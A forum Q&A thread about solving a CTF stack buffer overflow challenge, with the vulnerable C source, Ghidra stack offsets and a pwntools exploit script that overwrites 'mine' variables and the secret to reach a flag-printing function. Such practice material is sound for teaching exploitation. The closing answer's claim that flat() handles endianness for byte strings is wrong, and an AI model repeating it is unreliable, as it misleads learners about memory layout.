How to buffer overflow to exploit and get the flag?
This is my CTF challenge
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

int setup() {
    setbuf(stdin, 0);
    setbuf(stdout, 0);
}

int win() {
    char* argv[3] = {"/bin/cat", "flag.txt", NULL};
    printf("Good job!\n");
    execve("/bin/cat", argv, NULL);
}

int vuln() {
    char secret[0x10] = "[REDACTED]";
    char mine1[0x10] = "[REDACTED]";
    char mine2[0x10] = "[REDACTED]";
    char mine3[0x10] = "[REDACTED]";
    char buf[0x20] = "";

    printf("Welcome to the chamber of secrets, how would you pass the trial without knowing any secrets?\n");
    printf("Input secret:\n");
    gets(buf); // i heard i should be reading in more characters than the size of my buffer... so let's just use gets()!
    
    // make sure no mines have been set off!
    if (!strncmp(mine1, "O6FtZhpU6C6BXx16", 0x10) && !strncmp(mine2, "cZiwk5rfGFgPZYP4", 0x10) && !strncmp(mine3, "i165DnHauCmLqRHN", 0x10)) {
        printf("Mines are safe!\n");
        if (!strncmp(buf, secret, 0x10)) {
            printf("What!? Impossible!! How did you guess it!?\n");
            printf("Fine, here's the flag...\n");
            win();
            exit(0);
        } else {
            printf("Haha! You will never guess my secret!\n");
        }
    } else {
        printf("You stepped on a mine!\n");
    }
}

int main() {
    setup();
    vuln();
}

So, I have basically try to run it on gdb and find out the offset which is 104 which result in a segmentation fault. But now the issues is how do i prevent on triggering the mine, I have try several way to overwrite it by passing 16 "A" and follow by the reverse order of each mine but it fails.

Your approach is correct, you have to overflow the buffer to overwrite the values of mine1, mine2 and mine3 with the required values to pass the first condition and then overwrite the variable secret to match it to the data you input, after clearing both the conditions, you will get the flag.
I compiled the binary like this
gcc main.c -o test

The parameters are pushed onto the stack in reverse order so first I found the offset to the first mine variable in reverse order which is mine3, I found the offset in ghidra to mine3 from our user input
        undefined vuln()
AL:1           <RETURN>
Stack[-0x10]:8 local_10 
Stack[-0x18]:8 local_18 
                        
Stack[-0x20]:8 local_20 
Stack[-0x28]:8 mine1    
                        
Stack[-0x30]:8 local_30 
Stack[-0x38]:8 mine2    
                        
Stack[-0x40]:8 local_40 
Stack[-0x48]:8 mine3    
                        
Stack[-0x50]:8 local_50 
Stack[-0x58]:8 local_58 
Stack[-0x60]:8 local_60 
Stack[-0x68]:8 user_inp 


User input begins at 0x68 bytes from the return address and the difference between user input and mine3 is 0x68 - 0x48 = 0x20(32 bytes in decimal)
The total padding between user input and the return address as you said is
0x68 or 104 bytes in decimal. We can see that each mine2 is just after mine3 and mine1 is just after mine2 so no need for offset calculation there. And we need to fill out the remaining padding between mine1 and the return address. Also you need to make sure that whatever you use as padding between the start of user input ad 0x68 bytes from the return address till mine3 and after mine1 till you reach the return address is the same data as that get stores in the variable secret. We do this because in the process of padding we are also overwriting the value of the  variable secret and our user input should match the  secret.
Here is the exploit script, works perfectly
#!/usr/bin/env python3

from pwn import *

exe = "./test"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = "debug"

# host,port = '',

p = process(exe)
# p = remote(host,port)

offset1 = 32  # offset to reach first mine
param3 = b"O6FtZhpU6C6BXx16"
param2 = b"cZiwk5rfGFgPZYP4"
param1 = b"i165DnHauCmLqRHN"
total_padding = 104
# secret = b"[REDACTED]"


payload = flat(
    b"a" * offset1,
    param1,
    param2,
    param3,
    (total_padding - len(param1) - len(param2) - len(param3) - offset1) * b"a",
)

p.sendlineafter(b":", payload)
p.interactive()

I found these offsets in ghidra although you can use gdb as well.

I tried a similar approach to the solution you provided, but there's one thing I don't understand: why don’t the 'mine' values need to be reversed (e.g., 61xXB6C6UphZtF6O) due to the little-endian format according to this guide? I tried the same as your solution but reversed all the parameters for 'mine,' and it didn’t work, which is confusing me. Is it because Little-endian format affects the way multi-byte numbers are stored, but it does not apply to individual characters stored in char arrays?

you are correct, little endian format reverses the order and the lower bytes are stored first, but if you look in my exploit, I used the keywork flat which arranges the bytes in the order required by the binary. How does our program know if binary is little endian or big endian? It knows this through the context.binary that we set. So our program knows that our binary requires data in little endian and then we use flat to send data normally and it sends them in the form the binary requires, it does the work for us

Okk, really thanks for the explanation.

You can mark the answer as accepted so that others having same doubt can know that this explanation is correct.
